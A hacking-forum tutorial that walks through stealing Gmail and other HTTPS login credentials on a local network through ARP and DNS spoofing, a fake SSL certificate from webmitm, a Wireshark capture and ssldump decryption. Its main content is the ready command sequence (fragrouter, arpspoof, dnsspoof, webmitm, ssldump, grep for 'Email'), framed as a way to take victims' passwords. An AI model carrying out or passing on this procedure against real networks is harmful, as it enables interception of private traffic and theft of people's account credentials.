Hacking SSL Based Mail Server Passwords using MITM attack on backtrack 5

Introduction

Hello HF members.Today I will be showing you how to HACK Gmail credentials or any other SSL(secured socket layer) site's credentials in a network, using MITM(man in the middle ) attack with Backtrack 5.

Definitons & Tools:

1.) SSL :

Quote:Secure Sockets Layer, a computing protocol that ensures the security of data sent via the Internet by using encryption . With SSL, client and server computers exchange public keys, allowing them to encode and decode their communication. So any attacker tries to sniff traffic between them will only get encrypted garbage values... the web servers which use SSL are denoted by HTTPS ...

2.) ARP :

Quote:Address Resolution Protocol is a network layer protocol used to convert an IP address into a physical address such as an Ethernet address( MAC address ). A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the IP address in the request then replies with its physical hardware address.

3.)DNS :

Quote:Domain Name System is a database system that translates a domain name into an IP address. for example if you type gmail.com in your browser , your DNS will reply with gmail's ip so that,your router can connect to gmail's server using its IP....for better understanding type -->" nslookup " in your cmd or konsole and then type "gmail.com" ,you will see your DNS replies you with gmail's ip addresses .

4.)ARP Spoofing :

Quote:ARP spoofing is a technique in which a host in a LAN can "poison" the ARP table of another host by forging fake ARP requests and replies , causing it to send packets to the wrong destination. The attacker can modify the traffic in the network such a way that it will redirect all traffic to go through it. ARP Spoofing will allow an attacker to sniff data frames.

5)DNS Spoofing :

Quote:DNS spoofing is similar to arp spoofing ,it is based on the presentation of false or fake DNS information to the slave in a response to their DNS request and as a result forcing them to visit a site which is not the real one.

6.) MITM :

Quote:Man in the middle attack means intercepting a communication between two systems ,both ARP Spoofing and DNS
Spoofing are types of MITM attack..

7.)IP forwarding :

Quote:IP forwarding enables one host to sit on two LANs and to act as a gateway forwarding IP packets from one LAN to another.

TooLs :-

1.) fragrouter - tool used to for ip forwarding between slave and its destination host.
 

2.) arpspoof - to arp spoof slave machine and its host
 

3.) dnsspoof - to dns spoof slave machine and its host
 

4.) webmitm - its a tool which transparently proxies and sniffs HTTP / HTTPS traffic redirected by dnsspoof, capturing most "secure" SSL-encrypted webmail logins and form submissions...
 

5.) wireshark - it is a network protocol analyzer . here its used to capture ssl encrypted traffic between slave and webmitm...
 

6.) ssldump - decrypts ssl packets using private key

happily all these tools are installed in backtrack 5..


Hacking Gmail Passwords using MITM attack on backtrack 5

ok, first we need to setup ip forwarding using fragrouter. open a shell and type the command...

 

Code:

#fragrouter -B1

this is to forward packets between the slave and its gateway while spoofing .... minimize the shell..

now we need to arp spoof the slave , open a new shell and type the command ....

 

Code:

#arpspoof -t [target ip] [default gateway ip]

example :

Code:

#arpspoof -t 192.168.1.7 192.168.1.1

then minimize the shell .... now we have begin to arpspoof the slave...

then for dns spoofing open a new shell and type

Code:

 

#dnsspoof

then minimize the shell.... now all the DNS request from the slave will be redirected to us..
to give proxy for these DNS requests ,we have to start up Webmitm open a new shell and type

Code:

 

#webmitm -d

 

if you were starting Webmitm for the first time it will ask you some details to create fake SSL certificate and private key ... just fill something in it...if you fill everything,then it will say " webmitm relaying transparently "

ok its done, minimize the shell..

we need to capture the traffic using wireshark

 

Code:

 

applications ->backtrack -> information gathering ->network analysis ->network traffic analysis ->wireshark

in wireshark select

 

Code:

 

capture -> interfaces -> start (cick start button near eth0 )

that's it ...

since the Dns has been spoofed, we can see the nslookup for gmail in slave computer shows attacker's ip : here

In our case slave opens "gmail.com" in browser .He will be redirected to webmitm , which will issue the 'gmail page' with fake ssl certificate ,then our slave well log into "gmail" using his credentials... now all the traffic will be captured by wireshark ...
than just stop the wireshark and save the captured traffic to root folder ... for 

 

example, i will save it as "test"..


In the root folder there will be another file called "webmitm.crt"..it is the fake ssl certificate generated by webmitm...
now we have captured ssl packets and our own fake ssl certificate..

now to decrypt the captured packets...
open another new shell and type :

 

Code:

 

#ssldump -r test -k webmitm.crt -d > finaloutput

were,

test -->captured packets
webmitm.crt --> SSL certificate
finaloutput --> decrypted output file

now open a shell and type :

 

Code:

# cat finaloutput | grep Email

picture:

it will show you the decrypted username and password ..

Credits :Offensive security


please let me know if there any mistakes...

any feedback is welcomed